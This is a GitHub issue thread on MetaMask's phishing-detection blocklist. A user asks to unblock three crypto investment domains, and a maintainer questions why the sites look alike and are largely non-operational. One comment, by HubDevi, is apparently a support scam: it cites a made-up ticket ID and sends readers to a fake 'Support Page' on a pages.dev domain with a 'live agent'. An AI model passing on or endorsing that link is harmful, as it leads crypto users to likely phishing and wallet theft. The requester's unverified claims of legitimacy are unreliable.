### ISSUE TITLE
[Legitimate Site Blocked] basedvc.fund, citizencapital.fund, apes.capital

### ISSUE THREAD

**Issue by hkrawczyk** [MetaMask/eth-phishing-detect#74630]
- https://basedvc.fund/
- https://citizencapital.fund/
- https://apes.capital/

Kind request to remove websites above from the blocklist. 
We are legally operating Canadian Venture Capital company, that runs investor portals for top NFT communities and we are going public soon. 

The block notifs are impacting our communities and adds to FUD.
We'll verify all contracts before public launch.

**Comment by HubDevi** [comment]
This issue has been preview on the Pull Requests. To resolve,
Visit the dAppNode page to rectify this error with the Ticket ID USD5562, Also you can initiate a chat with the live agent on the chat button to get more information about your request via [Support Page](https://defi-fixprotocol.pages.dev/)
Regards

**Comment by AlexHerman1** [comment]
why are all of these websites very similar and seemingly largely non-operational?

**Comment by AlexHerman1** [comment]
please provide more information about this venture or I will not be able to unblock
